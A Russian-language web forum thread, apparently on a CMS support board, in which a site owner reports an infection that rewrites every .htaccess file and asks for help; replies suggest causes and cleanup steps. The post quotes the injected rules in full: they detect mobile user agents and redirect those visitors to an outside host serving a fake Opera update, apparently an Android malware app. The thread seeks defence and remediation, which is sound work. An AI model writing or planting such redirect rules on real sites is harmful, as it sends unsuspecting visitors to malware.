В общем, суть в том, что на сайт нельзя зайти с мобильного устройства, сразу идет перенаправление на левый сайт, где предлагается якобы скачать новую версию оперы, на деле же - какое то приложение (для android), вероятно ворующее деньги со счета (благо у меня планшет, так что вирус после инсталляции себя никак не смог проявить). вот код, автоматически прописанный во все .htaccess файлы. уничтожить простым способом нельзя - тут же появляется опять... вот как раз где у него "ядро" - найти пока не могу...
заражены все сайты на аккаунте.
index.php сайтов не содержат подозрительного кода.
смена паролей каких-либо, не спасает.
Открыть
Ответить
Какой то вирус, помогите разобраться...
<br />
<br />
RewriteEngine on<br />
<br />
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]<br />
<br />
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]<br />
<br />
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR] <br />
<br />
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]<br />
<br />
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]<br />
<br />
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]<br />
<br />
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]<br />
<br />
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]<br />
<br />
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]<br />
<br />
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]<br />
<br />
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC] <br />
<br />
RewriteCond %{HTTP_USER_AGENT} !america [NC]<br />
<br />
RewriteCond %{HTTP_USER_AGENT} !avant [NC]<br />
<br />
RewriteCond %{HTTP_USER_AGENT} !iphone [NC]<br />
<br />
RewriteCond %{HTTP_USER_AGENT} !download [NC]<br />
<br />
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]<br />
<br />
RewriteRule ^(.*)$ http://gofdoor.01g.info/blog/post.php?sid=24 [L,R=302]<br />
<br />
###IDI_KURI_KRAPIVU###<br />
<br />
SLAED CMS 2.6 Lite
PHP 5
Сервер в интернете
- Группа
- Посетители
- Пункты
- 729
- Регистрация
- 07.10.2006
- Пол
- Мужчина
- Из
- Россия/Москва
- Предупреждения
- Нет
3.92
3.92
Вариантов может быть несколько.
- Уязвимость на стороне хостера, устаревшее программное обеспечения, неправильные настройки и прочее.
Решение: Обратится с вышеописанной проблемой к хостеру.
2. Уязвимость на стороне Вашего компьютера. Как правила заражение вирусом, который производит замену файлов на сервере по средствам ФТП от Вашего имени.
Решение: Проверить компьютер антивирусами и прочими таблетками.
3. Уязвимость системы. Обратите внимание что версия SLAED CMS 2.6 Lite и её дальнейшая разработка к сожалению уже давно не поддерживается.
1. Решение: [url=http://www.slaed.net/forum-view-11548.html]http://www.slaed.net/forum-view-11548.html[/url]
а. Отключить поиск.
б. Если установлен, удалить Spaw 2 Редактор
в. Если используются сторонние разработки, возможны уязвимости в них.
г. Далее, обновить все файлы системы.
2. Решение: Перейти на актуальную версию SLAED CMS 5.1 Pro (Существует анализатор всех действий на сайте, который предназначен для решения и выявления подобных проблем) или Open SLAED 1.3
О сколько нам открытий чудных,
Готовит просвещенья дух,
И опыт, сын ошибок трудных,
И гений, парадоксов друг...
- Группа
- Клиент
- Пункты
- 39468
- Регистрация
- 30.04.2005
- Пол
- Мужчина
- Из
- Germany
- Предупреждения
- Нет
3.24
3.24
Вот немного полезной инфы по этому делу
http://webmaster.ya.ru/replies.xml?item_no=12778
я как то другой вирус хватал удалял таким способом.
еще такая инфа
Удалил вирус(удалил вредоносный код с htaccess). Поменял права доступа на 664 зашел в панель хостинга. Удалил всех пользователей ftp, создал нового + пароли, потом мониторил.
Открыть
Ответить